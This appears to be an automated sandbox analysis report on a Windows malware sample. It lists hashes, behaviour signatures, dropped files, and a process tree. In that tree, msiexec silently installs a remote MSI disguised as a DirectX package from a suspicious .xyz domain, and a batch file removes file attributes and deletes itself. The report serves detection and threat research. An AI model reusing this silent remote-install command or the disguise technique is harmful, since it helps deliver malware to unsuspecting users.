Analysis

  • max time kernel
    117s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20230712-en
  • resource tags

    arch:x64arch:x86image:win7-20230712-enlocale:en-usos:windows7-x64system
  • submitted
    19/08/2023, 06:14

General

  • Target

    3bf4b365d61c1e9807d20e71375627450b8fea1635cb6ddb85f2956e8f6b3ec3.exe

  • Size

    3.3MB

  • MD5

    e24bdc9074518cf8e0afd9f017855eee

  • SHA1

    afdf930278ae74d600d31463ba31ec2543ceb121

  • SHA256

    3bf4b365d61c1e9807d20e71375627450b8fea1635cb6ddb85f2956e8f6b3ec3

  • SHA512

    1e22b023695de9cff675366fd9433c087533f1a4b6c1a2ec64156fa77d2bc4f5f48264418fcc3273dd90d8c9d3b7aec8db08bf039abf5b86be8172c979016e8e

  • SSDEEP

    49152:xWtfl3xiDZjSPQaLOpU0dpBYYZFfsqWGXwuO6Bpp5DKXYpnF4tk11zppI04zmHZZ:ctfl0kYax0dMiNsqWGXwtyvKa

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Loads dropped DLL 2 IoCs
  • Use of msiexec (install) with remote resource 1 IoCs
  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies system certificate store 2 TTPs 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 34 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\3bf4b365d61c1e9807d20e71375627450b8fea1635cb6ddb85f2956e8f6b3ec3.exe
    "C:\Users\Admin\AppData\Local\Temp\3bf4b365d61c1e9807d20e71375627450b8fea1635cb6ddb85f2956e8f6b3ec3.exe"
    1⤵
    • Enumerates connected drives
    • Modifies system certificate store
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:760
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\system32\msiexec.exe" /i https://lazagrc3cnk.xyz/rm/ucontent/uid_457296/DirectX12AdvancedSupport.msi /quiet /qn /norestart AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\3bf4b365d61c1e9807d20e71375627450b8fea1635cb6ddb85f2956e8f6b3ec3.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1692166224 " AI_EUIMSI=""
      2⤵
      • Use of msiexec (install) with remote resource
      PID:2384
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\EXE8DF9.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:956
      • C:\Windows\SysWOW64\attrib.exe
        C:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Local\Temp\AIE7EE5.tmp"
        3⤵
        • Views/modifies file attributes
        PID:1808
      • C:\Windows\SysWOW64\attrib.exe
        C:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Local\Temp\EXE8DF9.bat"
        3⤵
        • Views/modifies file attributes
        PID:1496
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /S /D /c" del "C:\Users\Admin\AppData\Local\Temp\EXE8DF9.bat" "
        3⤵
          PID:2120
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" cls"
          3⤵
            PID:1884
      • C:\Windows\system32\msiexec.exe
        C:\Windows\system32\msiexec.exe /V
        1⤵
        • Blocklisted process makes network request
        • Enumerates connected drives
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1988
        • C:\Windows\syswow64\MsiExec.exe
          C:\Windows\syswow64\MsiExec.exe -Embedding 962405AE181551994663A4C922D91289 C
          2⤵
          • Loads dropped DLL
          PID:2628

      Network

            MITRE ATT&CK Enterprise v15

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

              Filesize

              344B

              MD5

              8f39b3d52cf6ddab907dec923cfe3c62

              SHA1

              39619b84759a61da492eb7251dc9756fa837a93e

              SHA256

              efcd0fa1fbbe09ee17dcd9e6ae796b9ebbe51d683c5d7a80d993b2775cccdb05

              SHA512

              5d6de2aff8a783b1de02363ee0fc72b5bec9844044f7f3102efaec52ab1f5521480868efa15b975904cb6bc87ff513c4978e0f34cfd8127f04ea3e302c445f58

            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

              Filesize

              344B

              MD5

              3804f0636a9ccc6b5c24c32cbe069e13

              SHA1

              8eedb63d40abef298b2d3481479b4ce79a26f97b

              SHA256

              e230ad074504b97e71411a3f7fae50029ad285ddefa2cc01c8b4bd938654f12f

              SHA512

              98267ab8305debff44a4ed2dd3940ce1a15363ca4479eb346763eab9e35aaa3c542f51d011576bf064d34ed6d94e2940b8c722cc47098f192dbb6f81da34b22d

            • C:\Users\Admin\AppData\Local\Temp\AIE7EE5.tmp

              Filesize

              4.1MB

              MD5

              0b02742b5d489839e5e112bfd2e0e653

              SHA1

              f1d5afeac227fa81e76a57374d6614fa078e4865

              SHA256

              130208c4a8f02c294315c49274f1e5266d9e1e38290c03ef5d1fc192cb8748f7

              SHA512

              5d38a1dbd6a45a94c6380cd349c6089d4c4d806889938233853196c96c441aae3fb2811b91ec2e6f5448924779048dd757567dba4ee6ea84f5085625ccf037e2

            • C:\Users\Admin\AppData\Local\Temp\AIE7EE5.tmp

              Filesize

              4.1MB

              MD5

              0b02742b5d489839e5e112bfd2e0e653

              SHA1

              f1d5afeac227fa81e76a57374d6614fa078e4865

              SHA256

              130208c4a8f02c294315c49274f1e5266d9e1e38290c03ef5d1fc192cb8748f7

              SHA512

              5d38a1dbd6a45a94c6380cd349c6089d4c4d806889938233853196c96c441aae3fb2811b91ec2e6f5448924779048dd757567dba4ee6ea84f5085625ccf037e2

            • C:\Users\Admin\AppData\Local\Temp\Cab79D3.tmp

              Filesize

              62KB

              MD5

              3ac860860707baaf32469fa7cc7c0192

              SHA1

              c33c2acdaba0e6fa41fd2f00f186804722477639

              SHA256

              d015145d551ecd14916270efad773bbc9fd57fad2228d2c24559f696c961d904

              SHA512

              d62ad2408c969a95550fb87efda50f988770ba5e39972041bf85924275baf156b8bec309ecc6409e5acdd37ec175dea40eff921ab58933b5b5b5d35a6147567c

            • C:\Users\Admin\AppData\Local\Temp\EXE8DF9.bat

              Filesize

              369B

              MD5

              f48618f68079f803651e9c70713cee30

              SHA1

              74401737b69e61b17291951391fee9d7d9692ee9

              SHA256

              2333662e381cb1248d57203a532ad958668a27679fc23d3f31f5fd68535e84ef

              SHA512

              f87505a24856196a990fff401ac93207a12b4aac5c512048421c74fef3dde02414e16df9acca53246149fe42a8a721366c793ef1e22f4881a795a1045dbf6ff5

            • C:\Users\Admin\AppData\Local\Temp\EXE8DF9.bat

              Filesize

              369B

              MD5

              f48618f68079f803651e9c70713cee30

              SHA1

              74401737b69e61b17291951391fee9d7d9692ee9

              SHA256

              2333662e381cb1248d57203a532ad958668a27679fc23d3f31f5fd68535e84ef

              SHA512

              f87505a24856196a990fff401ac93207a12b4aac5c512048421c74fef3dde02414e16df9acca53246149fe42a8a721366c793ef1e22f4881a795a1045dbf6ff5

            • C:\Users\Admin\AppData\Local\Temp\MSI89A4.tmp

              Filesize

              588KB

              MD5

              b7a6a99cbe6e762c0a61a8621ad41706

              SHA1

              92f45dd3ed3aaeaac8b488a84e160292ff86281e

              SHA256

              39fd8d36f8e5d915ad571ea429db3c3de6e9c160dbea7c3e137c9ba4b7fd301d

              SHA512

              a17e4512d906599b7f004ebb2f19ee2566ee93c2c18114ac05b0a0115a8c481592788f6b97da008795d5c31fb8d819ac82a5097b1792248319139c3face45642

            • C:\Users\Admin\AppData\Local\Temp\MSI8B2B.tmp

              Filesize

              1.1MB

              MD5

              8e3862ecc7a591df93cb916906eae863

              SHA1

              1c9f1f80be421f8c87662b5ab11749dd7604fcf2

              SHA256

              b980c67b11cc39f006535303151273749e4ca69dd370cf45b6110a0b5af77b68

              SHA512

              5d58c26f1f4ed448578e118c526a67159284e68b58062a0ff74492a38785fc94608ca09aadb5473f66dd0161fccdbad3ea4a2ed5c65396bef5e3d6572ac607ce

            • C:\Users\Admin\AppData\Local\Temp\Tar7A44.tmp

              Filesize

              164KB

              MD5

              4ff65ad929cd9a367680e0e5b1c08166

              SHA1

              c0af0d4396bd1f15c45f39d3b849ba444233b3a2

              SHA256

              c8733c93cc5aaf5ca206d06af22ee8dbdec764fb5085019a6a9181feb9dfdee6

              SHA512

              f530dc0d024a5a3b8903ffaaa41b608a5ccdd6da4ba1949f2c2e55a9fca475fec5c8d2119b5763cabe7ef1c3788fb9dcac621869db51d65b1d83cfe404fb4c27

            • \Users\Admin\AppData\Local\Temp\MSI89A4.tmp

              Filesize

              588KB

              MD5

              b7a6a99cbe6e762c0a61a8621ad41706

              SHA1

              92f45dd3ed3aaeaac8b488a84e160292ff86281e

              SHA256

              39fd8d36f8e5d915ad571ea429db3c3de6e9c160dbea7c3e137c9ba4b7fd301d

              SHA512

              a17e4512d906599b7f004ebb2f19ee2566ee93c2c18114ac05b0a0115a8c481592788f6b97da008795d5c31fb8d819ac82a5097b1792248319139c3face45642

            • \Users\Admin\AppData\Local\Temp\MSI8B2B.tmp

              Filesize

              1.1MB

              MD5

              8e3862ecc7a591df93cb916906eae863

              SHA1

              1c9f1f80be421f8c87662b5ab11749dd7604fcf2

              SHA256

              b980c67b11cc39f006535303151273749e4ca69dd370cf45b6110a0b5af77b68

              SHA512

              5d58c26f1f4ed448578e118c526a67159284e68b58062a0ff74492a38785fc94608ca09aadb5473f66dd0161fccdbad3ea4a2ed5c65396bef5e3d6572ac607ce

            • memory/760-54-0x0000000000270000-0x0000000000271000-memory.dmp

              Filesize

              4KB